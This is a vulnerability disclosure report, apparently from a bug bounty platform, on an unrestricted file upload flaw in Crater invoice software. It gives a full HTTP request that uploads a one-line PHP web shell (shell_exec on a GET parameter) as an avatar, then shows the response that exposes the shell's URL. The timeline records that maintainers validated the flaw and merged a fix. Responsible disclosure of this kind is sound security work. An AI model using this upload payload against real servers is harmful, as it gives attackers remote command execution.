Unrestricted Upload of File with Dangerous Type in crater-invoice/crater

Valid

Reported on

Dec 3rd 2021


Description

In recent Crater version (ed6268aa tag: 5.0.3) lowest privileged user can upload PHP file instead of avatar.

Proof of Concept

POST /api/v1/me/upload-avatar HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
company: 1
X-XSRF-TOKEN: eyJpdiI6IlBrOE1JS01vcDBqL0hqcXZURTRQMmc9PSIsInZhbHVlIjoiMVVSUVk5N3FmYTh2UG5KSiszSmp3aEg5MXlxSWFMUHRNZFpyME5LRFM3OEpiRWR3dlVCeDJ4a2FYQU9hYmFrZjBmNVBUbGp5UitIY1c3L1JtcWtGaDdoalBXSXU3L2NFS2NMbHZVT3JhNm1zeXdLZllkR2RNVGdKL3NuSWhWblciLCJtYWMiOiI0OTRhMmZkZGFjODA1MWY3ZWQyZmRhY2RhNmRkOTVlNDc0Njg2YzlmY2E2NzkyZjU0ZWExNjBiZjVhZGViMGE2IiwidGFnIjoiIn0=
Content-Type: multipart/form-data; boundary=---------------------------324661512726686552372889486730
Content-Length: 270
Origin: http://172.17.0.1:8888
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/admin/settings/account-settings
Cookie: XSRF-TOKEN=eyJpdiI6IlBrOE1JS01vcDBqL0hqcXZURTRQMmc9PSIsInZhbHVlIjoiMVVSUVk5N3FmYTh2UG5KSiszSmp3aEg5MXlxSWFMUHRNZFpyME5LRFM3OEpiRWR3dlVCeDJ4a2FYQU9hYmFrZjBmNVBUbGp5UitIY1c3L1JtcWtGaDdoalBXSXU3L2NFS2NMbHZVT3JhNm1zeXdLZllkR2RNVGdKL3NuSWhWblciLCJtYWMiOiI0OTRhMmZkZGFjODA1MWY3ZWQyZmRhY2RhNmRkOTVlNDc0Njg2YzlmY2E2NzkyZjU0ZWExNjBiZjVhZGViMGE2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im13VlVJa1JyZWs4OWFLWlBBa0JobXc9PSIsInZhbHVlIjoiU21kVnR2Skc1UnZmSnR3SVhiL09qSFBmWGxGV0FMUi9pSzFSTkc2enBZL01GbkJBbCtiMzJmWnNLM3l2OWRJRVk0bUZ2dFRYTkVTWnRQV0xCNnkxbFdIOEJjS1E5N2dwRWNyNC90cHZRSTJaWHozcWNtcmo2RTltY2U0Q1ZEeXQiLCJtYWMiOiJmMzIxYTFiNjU2Y2QyOWM2ZDdiOWJiYzMyYjQ3NWFmZGM3NDU0ZTA0MjNhZjg0ZGEzZDgzZGFlMGEwMjQzMGJmIiwidGFnIjoiIn0%3D; D5zxaxhEVxptcHSFSkkLadY5LtUnr9yDLzGS8IGz=eyJpdiI6Im9jcVpRWkgzTTM2dzZjb3ZsQnlvTnc9PSIsInZhbHVlIjoiWXhGWk9CNlNpQUw2YVNuSWhtekF0TDUwbExybG1jM0tramgzWUlkbVJYa3hCcU1DbnFFbjhwWG5mNGpEU2RsSCtubHBQcXNadDhESDVFU0hZOVRtTFVudmFVRzRtemdMMWpKWm5LZ0JmckJQYnpndE9YQ3p1ZUF4SlRuaWJPWlJCK2hQMjM1QUlEaWo2b28raFh3VTRaN3J4aDdiS3AxSTNtUkJtOE5kT2VqY0d6ejUzZHc2THZhNVNSYVRpcmJ0YWM1L3crdDJSWUU2NlNDb0hUS0xYVWI0anJIOGJWOVIrcFpzWW8yZlF5RnhLZVJ2cFcvUHF6VUZQVkd6MXFtdm9ncWlFTE1QaVBHM1gvR1piVUZnZ0ovR2hFMWhJTUI0cDl5VVdCYUlQNVNKa1VlVGVoVW05dkg1R3pyUUNkRDFtTnBCaCt3UnBqNWpYVGFPN05JeHVGamF5SVJmYVdMdVY1QmRNeHo2R25BWDQ0ay9KRXhxTlZxWnJnYW5hZUdsdk1XeXQ2Mm9wdzJxSmNhbU9OMnNiUVBPaitYQ3F3VzE1amQ5Zm5xbGxuVE1ReUxiaDd4RVNuTkNuUVpyQmpWMldUb1lKNHdXWWJkR3plUjVOcWZKOW91WHhxNG1hMmJqVElMbTR3blJhdFpJalFUTS9mM3UraGZjdDRRL1Ura2c4Wmx2d1piaFRYMmN0Uk1mTFkvVEZRPT0iLCJtYWMiOiJmOGY0NTVmYmUxYTQ4NDI0YzJkN2UxOGM0NzEyZWMwODUwODE4YjllZjM1ZDE4OGMzNDg5NjI1ZDhjYzIwOThiIiwidGFnIjoiIn0%3D

-----------------------------324661512726686552372889486730
Content-Disposition: form-data; name="admin_avatar"; filename="shell.php"
Content-Type: image/svg+xml

<?php print_r(shell_exec($_GET[1])); ?>
-----------------------------324661512726686552372889486730--

In response You can find link to uploaded file in data->avatar

{
    "data":
    {
        "id": 3,
        "name": "user2",
        "email": "user2-crater@zaqwsx.cc",
...
        "avatar": "http:\/\/172.17.0.1:8888\/storage\/4\/shell.php",
        "is_owner": false,
...
    }
}

Impact

This vulnerability is high and leads to code execution

Occurrences

Not validated file can be uploaded also here

Not validated file can be uploaded also here

We are processing your report and will contact the crater-invoice/crater team within 24 hours. 7 months ago
theworstcomrade modified the report
7 months ago
theworstcomrade modified the report
7 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 7 months ago
We have contacted a member of the crater-invoice/crater team and are waiting to hear back 7 months ago
Mohit Panjwani validated this vulnerability 7 months ago
theworstcomrade has been awarded the disclosure bounty
The fix bounty is now up for grabs
6 months ago
Mohit Panjwani confirmed that a fix has been merged on cdc913 6 months ago
theworstcomrade has been awarded the fix bounty
CompanyController.php#L95 has been validated
CompanyController.php#L64 has been validated
to join this conversation